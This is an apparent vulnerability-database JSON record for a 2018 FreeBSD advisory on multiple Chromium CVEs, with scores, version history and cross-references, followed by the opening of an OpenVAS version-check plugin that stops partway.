{"id": "427B0F58-644C-11E8-9E1B-E8E0B747A45A", "bulletinFamily": "unix", "title": "chromium -- multiple vulnerabilities", "description": "\nGoogle Chrome Releases reports:\n\n34 security fixes in this release, including:\n\n[835639] High CVE-2018-6123: Use after free in Blink. Reported by Looben Yang on 2018-04-22\n[840320] High CVE-2018-6124: Type confusion in Blink. Reported by Guang Gong of Alpha Team, Qihoo 360 on 2018-05-07\n[818592] High CVE-2018-6125: Overly permissive policy in WebUSB. Reported by Yubico, Inc on 2018-03-05\n[844457] High CVE-2018-6126: Heap buffer overflow in Skia. Reported by Ivan Fratric of Google Project Zero on 2018-05-18\n[842990] High CVE-2018-6127: Use after free in indexedDB. Reported by Looben Yang on 2018-05-15\n[841105] High CVE-2018-6128: uXSS in Chrome on iOS. Reported by Tomasz Bojarski on 2018-05-09\n[838672] High CVE-2018-6129: Out of bounds memory access in WebRTC. Reported by Natalie Silvanovich of Google Project Zero on 2018-05-01\n[838402] High CVE-2018-6130: Out of bounds memory access in WebRTC. Reported by Natalie Silvanovich of Google Project Zero on 2018-04-30\n[826434] High CVE-2018-6131: Incorrect mutability protection in WebAssembly. Reported by Natalie Silvanovich of Google Project Zero on 2018-03-27\n[839960] Medium CVE-2018-6132: Use of uninitialized memory in WebRTC. Reported by Ronald E. Crane on 2018-05-04\n[817247] Medium CVE-2018-6133: URL spoof in Omnibox. Reported by Khalil Zhani on 2018-02-28\n[797465] Medium CVE-2018-6134: Referrer Policy bypass in Blink. Reported by Jun Kokatsu (@shhnjk) on 2017-12-23\n[823353] Medium CVE-2018-6135: UI spoofing in Blink. Reported by Jasper Rebane on 2018-03-19\n[831943] Medium CVE-2018-6136: Out of bounds memory access in V8. Reported by Peter Wong on 2018-04-12\n[835589] Medium CVE-2018-6137: Leak of visited status of page in Blink. Reported by Michael Smith (spinda.net) on 2018-04-21\n[810220] Medium CVE-2018-6138: Overly permissive policy in Extensions. Reported by Francois Lajeunesse-Robert on 2018-02-08\n[805224] Medium CVE-2018-6139: Restrictions bypass in the debugger extension API. Reported by Rob Wu on 2018-01-24\n[798222] Medium CVE-2018-6140: Restrictions bypass in the debugger extension API. Reported by Rob Wu on 2018-01-01\n[796107] Medium CVE-2018-6141: Heap buffer overflow in Skia. Reported by Yangkang (@dnpushme) and Wanglu of Qihoo360 Qex Team on 2017-12-19\n[837939] Medium CVE-2018-6142: Out of bounds memory access in V8. Reported by Choongwoo Han of Naver Corporation on 2018-04-28\n[843022] Medium CVE-2018-6143: Out of bounds memory access in V8. Reported by Guang Gong of Alpha Team, Qihoo 360 on 2018-05-15\n[828049] Low CVE-2018-6144: Out of bounds memory access in PDFium. Reported by pdknsk on 2018-04-02\n[805924] Low CVE-2018-6145: Incorrect escaping of MathML in Blink. Reported by Masato Kinugawa on 2018-01-25\n[818133] Low CVE-2018-6147: Password fields not taking advantage of OS protections in Views. Reported by Michail Pishchagin (Yandex) on 2018-03-02\n[847542] Various fixes from internal audits, fuzzing and other initiatives\n\n\n", "published": "2018-05-29T00:00:00", "modified": "2018-05-29T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://vuxml.freebsd.org/freebsd/427b0f58-644c-11e8-9e1b-e8e0b747a45a.html", "reporter": "FreeBSD", "references": ["https://chromereleases.googleblog.com/2018/05/stable-channel-update-for-desktop_58.html"], "cvelist": ["CVE-2018-6130", "CVE-2018-6138", "CVE-2018-6125", "CVE-2018-6129", "CVE-2018-6139", "CVE-2018-6144", "CVE-2018-6134", "CVE-2018-6131", "CVE-2018-6128", "CVE-2018-6124", "CVE-2018-6142", "CVE-2018-6136", "CVE-2018-6133", "CVE-2018-6141", "CVE-2018-6140", "CVE-2018-6137", "CVE-2018-6127", "CVE-2018-6147", "CVE-2018-6123", "CVE-2018-6145", "CVE-2018-6132", "CVE-2018-6126", "CVE-2018-6135", "CVE-2018-6143"], "type": "freebsd", "lastseen": "2019-05-29T18:31:55", "history": [{"bulletin": {"affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "chromium", "packageVersion": "67.0.3396.62"}], "bulletinFamily": "unix", "cvelist": ["CVE-2018-6130", "CVE-2018-6138", "CVE-2018-6125", "CVE-2018-6129", "CVE-2018-6139", "CVE-2018-6144", "CVE-2018-6134", "CVE-2018-6131", "CVE-2018-6128", "CVE-2018-6124", "CVE-2018-6142", "CVE-2018-6136", "CVE-2018-6133", "CVE-2018-6141", "CVE-2018-6140", "CVE-2018-6137", "CVE-2018-6127", "CVE-2018-6147", "CVE-2018-6123", "CVE-2018-6145", "CVE-2018-6132", "CVE-2018-6126", "CVE-2018-6135", "CVE-2018-6143"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "\nGoogle Chrome Releases reports:\n\n34 security fixes in this release, including:\n\n[835639] High CVE-2018-6123: Use after free in Blink. Reported by Looben Yang on 2018-04-22\n[840320] High CVE-2018-6124: Type confusion in Blink. Reported by Guang Gong of Alpha Team, Qihoo 360 on 2018-05-07\n[818592] High CVE-2018-6125: Overly permissive policy in WebUSB. Reported by Yubico, Inc on 2018-03-05\n[844457] High CVE-2018-6126: Heap buffer overflow in Skia. Reported by Ivan Fratric of Google Project Zero on 2018-05-18\n[842990] High CVE-2018-6127: Use after free in indexedDB. Reported by Looben Yang on 2018-05-15\n[841105] High CVE-2018-6128: uXSS in Chrome on iOS. Reported by Tomasz Bojarski on 2018-05-09\n[838672] High CVE-2018-6129: Out of bounds memory access in WebRTC. Reported by Natalie Silvanovich of Google Project Zero on 2018-05-01\n[838402] High CVE-2018-6130: Out of bounds memory access in WebRTC. Reported by Natalie Silvanovich of Google Project Zero on 2018-04-30\n[826434] High CVE-2018-6131: Incorrect mutability protection in WebAssembly. Reported by Natalie Silvanovich of Google Project Zero on 2018-03-27\n[839960] Medium CVE-2018-6132: Use of uninitialized memory in WebRTC. Reported by Ronald E. Crane on 2018-05-04\n[817247] Medium CVE-2018-6133: URL spoof in Omnibox. Reported by Khalil Zhani on 2018-02-28\n[797465] Medium CVE-2018-6134: Referrer Policy bypass in Blink. Reported by Jun Kokatsu (@shhnjk) on 2017-12-23\n[823353] Medium CVE-2018-6135: UI spoofing in Blink. Reported by Jasper Rebane on 2018-03-19\n[831943] Medium CVE-2018-6136: Out of bounds memory access in V8. Reported by Peter Wong on 2018-04-12\n[835589] Medium CVE-2018-6137: Leak of visited status of page in Blink. Reported by Michael Smith (spinda.net) on 2018-04-21\n[810220] Medium CVE-2018-6138: Overly permissive policy in Extensions. Reported by Francois Lajeunesse-Robert on 2018-02-08\n[805224] Medium CVE-2018-6139: Restrictions bypass in the debugger extension API. Reported by Rob Wu on 2018-01-24\n[798222] Medium CVE-2018-6140: Restrictions bypass in the debugger extension API. Reported by Rob Wu on 2018-01-01\n[796107] Medium CVE-2018-6141: Heap buffer overflow in Skia. Reported by Yangkang (@dnpushme) and Wanglu of Qihoo360 Qex Team on 2017-12-19\n[837939] Medium CVE-2018-6142: Out of bounds memory access in V8. Reported by Choongwoo Han of Naver Corporation on 2018-04-28\n[843022] Medium CVE-2018-6143: Out of bounds memory access in V8. Reported by Guang Gong of Alpha Team, Qihoo 360 on 2018-05-15\n[828049] Low CVE-2018-6144: Out of bounds memory access in PDFium. Reported by pdknsk on 2018-04-02\n[805924] Low CVE-2018-6145: Incorrect escaping of MathML in Blink. Reported by Masato Kinugawa on 2018-01-25\n[818133] Low CVE-2018-6147: Password fields not taking advantage of OS protections in Views. Reported by Michail Pishchagin (Yandex) on 2018-03-02\n[847542] Various fixes from internal audits, fuzzing and other initiatives\n\n\n", "edition": 1, "enchantments": {"score": {"modified": "2018-05-31T02:36:44", "value": 7.5, "vector": "NONE"}}, "hash": "5d8555729e3b4a54ef4b635605f1881149e2ef9e103348e18470cc04a661d7df", "hashmap": [{"hash": "f2fc86205bbdcc937de18a4d12929cf8", "key": "title"}, {"hash": "b64508e3f0b3f327d07f27ef004d55b3", "key": "references"}, {"hash": "a3dc630729e463135f4e608954fa6e19", "key": "reporter"}, {"hash": "2bdfeb0e4d55e60b56a919e66cfe1baf", "key": "href"}, {"hash": "7d84a0a1947431b526ab69244104efb2", "key": "affectedPackage"}, {"hash": "8cdc434bfe47937b61b5842f9f82b1d2", "key": "published"}, {"hash": "445319fbb3c3ecc0cf12b409ab0a742d", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "1527e888767cdce15d200b870b39cfd0", "key": "type"}, {"hash": "8cdc434bfe47937b61b5842f9f82b1d2", "key": "modified"}, {"hash": "27ee8f72ffae8ef23d2ee0018fb724db", "key": "description"}], "history": [], "href": "https://vuxml.freebsd.org/freebsd/427b0f58-644c-11e8-9e1b-e8e0b747a45a.html", "id": "427B0F58-644C-11E8-9E1B-E8E0B747A45A", "lastseen": "2018-05-31T02:36:44", "modified": "2018-05-29T00:00:00", "objectVersion": "1.3", "published": "2018-05-29T00:00:00", "references": ["https://chromereleases.googleblog.com/2018/05/stable-channel-update-for-desktop_58.html"], "reporter": "FreeBSD", "title": "chromium -- multiple vulnerabilities", "type": "freebsd", "viewCount": 4}, "differentElements": ["cvss"], "edition": 1, "lastseen": "2018-05-31T02:36:44"}, {"bulletin": {"affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "chromium", "packageVersion": "67.0.3396.62"}], "bulletinFamily": "unix", "cvelist": ["CVE-2018-6130", "CVE-2018-6138", "CVE-2018-6125", "CVE-2018-6129", "CVE-2018-6139", "CVE-2018-6144", "CVE-2018-6134", "CVE-2018-6131", "CVE-2018-6128", "CVE-2018-6124", "CVE-2018-6142", "CVE-2018-6136", "CVE-2018-6133", "CVE-2018-6141", "CVE-2018-6140", "CVE-2018-6137", "CVE-2018-6127", "CVE-2018-6147", "CVE-2018-6123", "CVE-2018-6145", "CVE-2018-6132", "CVE-2018-6126", "CVE-2018-6135", "CVE-2018-6143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "\nGoogle Chrome Releases reports:\n\n34 security fixes in this release, including:\n\n[835639] High CVE-2018-6123: Use after free in Blink. Reported by Looben Yang on 2018-04-22\n[840320] High CVE-2018-6124: Type confusion in Blink. Reported by Guang Gong of Alpha Team, Qihoo 360 on 2018-05-07\n[818592] High CVE-2018-6125: Overly permissive policy in WebUSB. Reported by Yubico, Inc on 2018-03-05\n[844457] High CVE-2018-6126: Heap buffer overflow in Skia. Reported by Ivan Fratric of Google Project Zero on 2018-05-18\n[842990] High CVE-2018-6127: Use after free in indexedDB. Reported by Looben Yang on 2018-05-15\n[841105] High CVE-2018-6128: uXSS in Chrome on iOS. Reported by Tomasz Bojarski on 2018-05-09\n[838672] High CVE-2018-6129: Out of bounds memory access in WebRTC. Reported by Natalie Silvanovich of Google Project Zero on 2018-05-01\n[838402] High CVE-2018-6130: Out of bounds memory access in WebRTC. Reported by Natalie Silvanovich of Google Project Zero on 2018-04-30\n[826434] High CVE-2018-6131: Incorrect mutability protection in WebAssembly. Reported by Natalie Silvanovich of Google Project Zero on 2018-03-27\n[839960] Medium CVE-2018-6132: Use of uninitialized memory in WebRTC. Reported by Ronald E. Crane on 2018-05-04\n[817247] Medium CVE-2018-6133: URL spoof in Omnibox. Reported by Khalil Zhani on 2018-02-28\n[797465] Medium CVE-2018-6134: Referrer Policy bypass in Blink. Reported by Jun Kokatsu (@shhnjk) on 2017-12-23\n[823353] Medium CVE-2018-6135: UI spoofing in Blink. Reported by Jasper Rebane on 2018-03-19\n[831943] Medium CVE-2018-6136: Out of bounds memory access in V8. Reported by Peter Wong on 2018-04-12\n[835589] Medium CVE-2018-6137: Leak of visited status of page in Blink. Reported by Michael Smith (spinda.net) on 2018-04-21\n[810220] Medium CVE-2018-6138: Overly permissive policy in Extensions. Reported by Francois Lajeunesse-Robert on 2018-02-08\n[805224] Medium CVE-2018-6139: Restrictions bypass in the debugger extension API. Reported by Rob Wu on 2018-01-24\n[798222] Medium CVE-2018-6140: Restrictions bypass in the debugger extension API. Reported by Rob Wu on 2018-01-01\n[796107] Medium CVE-2018-6141: Heap buffer overflow in Skia. Reported by Yangkang (@dnpushme) and Wanglu of Qihoo360 Qex Team on 2017-12-19\n[837939] Medium CVE-2018-6142: Out of bounds memory access in V8. Reported by Choongwoo Han of Naver Corporation on 2018-04-28\n[843022] Medium CVE-2018-6143: Out of bounds memory access in V8. Reported by Guang Gong of Alpha Team, Qihoo 360 on 2018-05-15\n[828049] Low CVE-2018-6144: Out of bounds memory access in PDFium. Reported by pdknsk on 2018-04-02\n[805924] Low CVE-2018-6145: Incorrect escaping of MathML in Blink. Reported by Masato Kinugawa on 2018-01-25\n[818133] Low CVE-2018-6147: Password fields not taking advantage of OS protections in Views. Reported by Michail Pishchagin (Yandex) on 2018-03-02\n[847542] Various fixes from internal audits, fuzzing and other initiatives\n\n\n", "edition": 3, "enchantments": {"dependencies": {"modified": "2019-01-17T12:03:49", "references": [{"idList": ["FREEBSD_PKG_427B0F58644C11E89E1BE8E0B747A45A.NASL", "DEBIAN_DSA-4237.NASL", "UBUNTU_USN-3682-1.NASL", "FEDORA_2018-7C80AAEF26.NASL", "OPENSUSE-2018-759.NASL", "REDHAT-RHSA-2018-1815.NASL", "OPENSUSE-2018-546.NASL", "MACOSX_GOOGLE_CHROME_67_0_3396_62.NASL", "FEDORA_2018-09B59B0227.NASL", "GOOGLE_CHROME_67_0_3396_62.NASL"], "type": "nessus"}, {"idList": ["EDB-ID:44862", "EDB-ID:44863", "EDB-ID:45098"], "type": "exploitdb"}, {"idList": ["USN-3682-1"], "type": "ubuntu"}, {"idList": ["OPENSUSE-SU-2018:1484-1", "OPENSUSE-SU-2018:2054-1", "OPENSUSE-SU-2018:1485-1", "OPENSUSE-SU-2018:2055-1", "OPENSUSE-SU-2018:1616-1"], "type": "suse"}, {"idList": ["CVE-2018-6139", "CVE-2018-6144", "CVE-2018-6124", "CVE-2018-6133", "CVE-2018-6140", "CVE-2018-6137", "CVE-2018-6147", "CVE-2018-6126", "CVE-2018-6135", "CVE-2018-6143"], "type": "cve"}, {"idList": ["THREATPOST:06CF4AB78C7900E0E881A9B5B24C9D21"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310874714", "OPENVAS:1361412562310851779", "OPENVAS:1361412562310851772", "OPENVAS:1361412562310704237", "OPENVAS:1361412562310813394", "OPENVAS:1361412562310813505", "OPENVAS:1361412562310813504", "OPENVAS:1361412562310813503", "OPENVAS:1361412562310874678", "OPENVAS:1361412562310851821"], "type": "openvas"}, {"idList": ["1337DAY-ID-30792", "1337DAY-ID-30558", "1337DAY-ID-30557"], "type": "zdt"}, {"idList": ["GLSA-201810-01"], "type": "gentoo"}, {"idList": ["YSA-2018-02"], "type": "yubico"}, {"idList": ["RHSA-2018:2113", "RHSA-2018:1815", "RHSA-2018:2112"], "type": "redhat"}, {"idList": ["CESA-2018:2113", "CESA-2018:2112"], "type": "centos"}, {"idList": ["ELSA-2018-2113"], "type": "oraclelinux"}, {"idList": ["DEBIAN:DSA-4220-1:6730A", "DEBIAN:DSA-4237-1:5AD61"], "type": "debian"}, {"idList": ["KLA11257", "KLA11259"], "type": "kaspersky"}]}, "score": {"modified": "2019-01-17T12:03:49", "value": 7.5, "vector": "NONE"}}, "hash": "6193fa1ba3af726f9d4ca607fffddcf7ef0adef2a6e362ce92fa93bd3df3903e", "hashmap": [{"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "f2fc86205bbdcc937de18a4d12929cf8", "key": "title"}, {"hash": "b64508e3f0b3f327d07f27ef004d55b3", "key": "references"}, {"hash": "a3dc630729e463135f4e608954fa6e19", "key": "reporter"}, {"hash": "2bdfeb0e4d55e60b56a919e66cfe1baf", "key": "href"}, {"hash": "7d84a0a1947431b526ab69244104efb2", "key": "affectedPackage"}, {"hash": "8cdc434bfe47937b61b5842f9f82b1d2", "key": "published"}, {"hash": "445319fbb3c3ecc0cf12b409ab0a742d", "key": "cvelist"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "1527e888767cdce15d200b870b39cfd0", "key": "type"}, {"hash": "8cdc434bfe47937b61b5842f9f82b1d2", "key": "modified"}, {"hash": "27ee8f72ffae8ef23d2ee0018fb724db", "key": "description"}], "history": [], "href": "https://vuxml.freebsd.org/freebsd/427b0f58-644c-11e8-9e1b-e8e0b747a45a.html", "id": "427B0F58-644C-11E8-9E1B-E8E0B747A45A", "lastseen": "2019-01-17T12:03:49", "modified": "2018-05-29T00:00:00", "objectVersion": "1.3", "published": "2018-05-29T00:00:00", "references": ["https://chromereleases.googleblog.com/2018/05/stable-channel-update-for-desktop_58.html"], "reporter": "FreeBSD", "title": "chromium -- multiple vulnerabilities", "type": "freebsd", "viewCount": 4}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2019-01-17T12:03:49"}, {"bulletin": {"affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "chromium", "packageVersion": "67.0.3396.62"}], "bulletinFamily": "unix", "cvelist": ["CVE-2018-6130", "CVE-2018-6138", "CVE-2018-6125", "CVE-2018-6129", "CVE-2018-6139", "CVE-2018-6144", "CVE-2018-6134", "CVE-2018-6131", "CVE-2018-6128", "CVE-2018-6124", "CVE-2018-6142", "CVE-2018-6136", "CVE-2018-6133", "CVE-2018-6141", "CVE-2018-6140", "CVE-2018-6137", "CVE-2018-6127", "CVE-2018-6147", "CVE-2018-6123", "CVE-2018-6145", "CVE-2018-6132", "CVE-2018-6126", "CVE-2018-6135", "CVE-2018-6143"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "\nGoogle Chrome Releases reports:\n\n34 security fixes in this release, including:\n\n[835639] High CVE-2018-6123: Use after free in Blink. Reported by Looben Yang on 2018-04-22\n[840320] High CVE-2018-6124: Type confusion in Blink. Reported by Guang Gong of Alpha Team, Qihoo 360 on 2018-05-07\n[818592] High CVE-2018-6125: Overly permissive policy in WebUSB. Reported by Yubico, Inc on 2018-03-05\n[844457] High CVE-2018-6126: Heap buffer overflow in Skia. Reported by Ivan Fratric of Google Project Zero on 2018-05-18\n[842990] High CVE-2018-6127: Use after free in indexedDB. Reported by Looben Yang on 2018-05-15\n[841105] High CVE-2018-6128: uXSS in Chrome on iOS. Reported by Tomasz Bojarski on 2018-05-09\n[838672] High CVE-2018-6129: Out of bounds memory access in WebRTC. Reported by Natalie Silvanovich of Google Project Zero on 2018-05-01\n[838402] High CVE-2018-6130: Out of bounds memory access in WebRTC. Reported by Natalie Silvanovich of Google Project Zero on 2018-04-30\n[826434] High CVE-2018-6131: Incorrect mutability protection in WebAssembly. Reported by Natalie Silvanovich of Google Project Zero on 2018-03-27\n[839960] Medium CVE-2018-6132: Use of uninitialized memory in WebRTC. Reported by Ronald E. Crane on 2018-05-04\n[817247] Medium CVE-2018-6133: URL spoof in Omnibox. Reported by Khalil Zhani on 2018-02-28\n[797465] Medium CVE-2018-6134: Referrer Policy bypass in Blink. Reported by Jun Kokatsu (@shhnjk) on 2017-12-23\n[823353] Medium CVE-2018-6135: UI spoofing in Blink. Reported by Jasper Rebane on 2018-03-19\n[831943] Medium CVE-2018-6136: Out of bounds memory access in V8. Reported by Peter Wong on 2018-04-12\n[835589] Medium CVE-2018-6137: Leak of visited status of page in Blink. Reported by Michael Smith (spinda.net) on 2018-04-21\n[810220] Medium CVE-2018-6138: Overly permissive policy in Extensions. Reported by Francois Lajeunesse-Robert on 2018-02-08\n[805224] Medium CVE-2018-6139: Restrictions bypass in the debugger extension API. Reported by Rob Wu on 2018-01-24\n[798222] Medium CVE-2018-6140: Restrictions bypass in the debugger extension API. Reported by Rob Wu on 2018-01-01\n[796107] Medium CVE-2018-6141: Heap buffer overflow in Skia. Reported by Yangkang (@dnpushme) and Wanglu of Qihoo360 Qex Team on 2017-12-19\n[837939] Medium CVE-2018-6142: Out of bounds memory access in V8. Reported by Choongwoo Han of Naver Corporation on 2018-04-28\n[843022] Medium CVE-2018-6143: Out of bounds memory access in V8. Reported by Guang Gong of Alpha Team, Qihoo 360 on 2018-05-15\n[828049] Low CVE-2018-6144: Out of bounds memory access in PDFium. Reported by pdknsk on 2018-04-02\n[805924] Low CVE-2018-6145: Incorrect escaping of MathML in Blink. Reported by Masato Kinugawa on 2018-01-25\n[818133] Low CVE-2018-6147: Password fields not taking advantage of OS protections in Views. Reported by Michail Pishchagin (Yandex) on 2018-03-02\n[847542] Various fixes from internal audits, fuzzing and other initiatives\n\n\n", "edition": 2, "enchantments": {"score": {"modified": "2019-01-15T12:03:21", "value": 7.5, "vector": "NONE"}}, "hash": "dd7315adcf9a6d2d7b7efc4feba809630cf45872f1ccc838388670a0dd13609d", "hashmap": [{"hash": "f2fc86205bbdcc937de18a4d12929cf8", "key": "title"}, {"hash": "b64508e3f0b3f327d07f27ef004d55b3", "key": "references"}, {"hash": "a3dc630729e463135f4e608954fa6e19", "key": "reporter"}, {"hash": "2bdfeb0e4d55e60b56a919e66cfe1baf", "key": "href"}, {"hash": "7d84a0a1947431b526ab69244104efb2", "key": "affectedPackage"}, {"hash": "8cdc434bfe47937b61b5842f9f82b1d2", "key": "published"}, {"hash": "445319fbb3c3ecc0cf12b409ab0a742d", "key": "cvelist"}, {"hash": "4913a9178621eadcdf191db17915fbcb", "key": "bulletinFamily"}, {"hash": "1527e888767cdce15d200b870b39cfd0", "key": "type"}, {"hash": "8cdc434bfe47937b61b5842f9f82b1d2", "key": "modified"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "27ee8f72ffae8ef23d2ee0018fb724db", "key": "description"}], "history": [], "href": "https://vuxml.freebsd.org/freebsd/427b0f58-644c-11e8-9e1b-e8e0b747a45a.html", "id": "427B0F58-644C-11E8-9E1B-E8E0B747A45A", "lastseen": "2019-01-15T12:03:21", "modified": "2018-05-29T00:00:00", "objectVersion": "1.3", "published": "2018-05-29T00:00:00", "references": ["https://chromereleases.googleblog.com/2018/05/stable-channel-update-for-desktop_58.html"], "reporter": "FreeBSD", "title": "chromium -- multiple vulnerabilities", "type": "freebsd", "viewCount": 4}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2019-01-15T12:03:21"}], "edition": 4, "hashmap": [{"key": "affectedPackage", "hash": "7d84a0a1947431b526ab69244104efb2"}, {"key": "bulletinFamily", "hash": "4913a9178621eadcdf191db17915fbcb"}, {"key": "cvelist", "hash": "445319fbb3c3ecc0cf12b409ab0a742d"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "description", "hash": "27ee8f72ffae8ef23d2ee0018fb724db"}, {"key": "href", "hash": "2bdfeb0e4d55e60b56a919e66cfe1baf"}, {"key": "modified", "hash": "8cdc434bfe47937b61b5842f9f82b1d2"}, {"key": "published", "hash": "8cdc434bfe47937b61b5842f9f82b1d2"}, {"key": "references", "hash": "b64508e3f0b3f327d07f27ef004d55b3"}, {"key": "reporter", "hash": "a3dc630729e463135f4e608954fa6e19"}, {"key": "title", "hash": "f2fc86205bbdcc937de18a4d12929cf8"}, {"key": "type", "hash": "1527e888767cdce15d200b870b39cfd0"}], "hash": "e647db018e3d4ec88fa1b322e8e3a6fd25b8a25e854f11c3d2e6c4ec2e196300", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2018:2054-1", "OPENSUSE-SU-2018:2055-1", "OPENSUSE-SU-2018:1485-1", "OPENSUSE-SU-2018:1484-1", "OPENSUSE-SU-2018:1616-1"]}, {"type": "nessus", "idList": ["FEDORA_2018-09B59B0227.NASL", "FEDORA_2018-7C80AAEF26.NASL", "OPENSUSE-2018-546.NASL", "MACOSX_GOOGLE_CHROME_67_0_3396_62.NASL", "OPENSUSE-2018-759.NASL", "GOOGLE_CHROME_67_0_3396_62.NASL", "FREEBSD_PKG_427B0F58644C11E89E1BE8E0B747A45A.NASL", "REDHAT-RHSA-2018-1815.NASL", "DEBIAN_DSA-4237.NASL", "SUSE_SU-2018-1820-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310813504", "OPENVAS:1361412562310813505", "OPENVAS:1361412562310874678", "OPENVAS:1361412562310813503", "OPENVAS:1361412562310851821", "OPENVAS:1361412562310851772", "OPENVAS:1361412562310874714", "OPENVAS:1361412562310704237", "OPENVAS:1361412562310851779", "OPENVAS:1361412562310843555"]}, {"type": "redhat", "idList": ["RHSA-2018:1815", "RHSA-2018:2113", "RHSA-2018:2112"]}, {"type": "kaspersky", "idList": ["KLA11257", "KLA11259"]}, {"type": "threatpost", "idList": ["THREATPOST:06CF4AB78C7900E0E881A9B5B24C9D21"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4237-1:5AD61", "DEBIAN:DSA-4220-1:6730A"]}, {"type": "cve", "idList": ["CVE-2018-6144", "CVE-2018-6124", "CVE-2018-6140", "CVE-2018-6147", "CVE-2018-6137", "CVE-2018-6123", "CVE-2018-6135", "CVE-2018-6139", "CVE-2018-6127", "CVE-2018-6126"]}, {"type": "yubico", "idList": ["YSA-2018-02"]}, {"type": "exploitdb", "idList": ["EDB-ID:44862", "EDB-ID:44863", "EDB-ID:45098"]}, {"type": "ubuntu", "idList": ["USN-3682-1"]}, {"type": "zdt", "idList": ["1337DAY-ID-30557", "1337DAY-ID-30792", "1337DAY-ID-30558"]}, {"type": "oraclelinux", "idList": ["ELSA-2018-2113"]}, {"type": "centos", "idList": ["CESA-2018:2113", "CESA-2018:2112"]}, {"type": "gentoo", "idList": ["GLSA-201810-01"]}], "modified": "2019-05-29T18:31:55"}, "score": {"value": 7.3, "vector": "NONE", "modified": "2019-05-29T18:31:55"}, "vulnersScore": 7.3}, "objectVersion": "1.3", "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "chromium", "packageVersion": "67.0.3396.62"}], "scheme": null}

{"openvas": [{"lastseen": "2019-05-29T18:32:52", "bulletinFamily": "scanner", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2019-05-17T00:00:00", "published": "2018-05-30T00:00:00", "id": "OPENVAS:1361412562310813505", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813505", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Windows", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Windows\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813505\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-6123\", \"CVE-2018-6124\", \"CVE-2018-6125\", \"CVE-2018-6126\",\n \"CVE-2018-6127\", \"CVE-2018-6128\", \"CVE-2018-6129\", \"CVE-2018-6130\",\n \"CVE-2018-6131\", \"CVE-2018-6132\", \"CVE-2018-6133\", \"CVE-2018-6134\",\n \"CVE-2018-6135\", \"CVE-2018-6136\", \"CVE-2018-6137\", \"CVE-2018-6138\",\n \"CVE-2018-6139\", \"CVE-2018-6140\", \"CVE-2018-6141\", \"CVE-2018-6142\",\n \"CVE-2018-6143\", \"CVE-2018-6144\", \"CVE-2018-6145\", \"CVE-2018-6147\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-30 10:55:29 +0530 (Wed, 30 May 2018)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop_29-2018-05)-Windows\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An use after free in Blink.\n\n - Type confusion in Blink.\n\n - Overly permissive policy in WebUSB.\n\n - Heap buffer overflow in Skia.\n\n - Use after free in indexedDB.\n\n - uXSS in Chrome on iOS.\n\n - Out of bounds memory access in WebRTC, V8 and PDFium.\n\n - Incorrect mutability protection in WebAssembly.\n\n - Use of uninitialized memory in WebRTC.\n\n - URL spoof in Omnibox.\n\n - Referrer Policy bypass in Blink.\n\n - UI spoofing in Blink.\n\n - Leak of visited status of page in Blink.\n\n - Overly permissive policy in 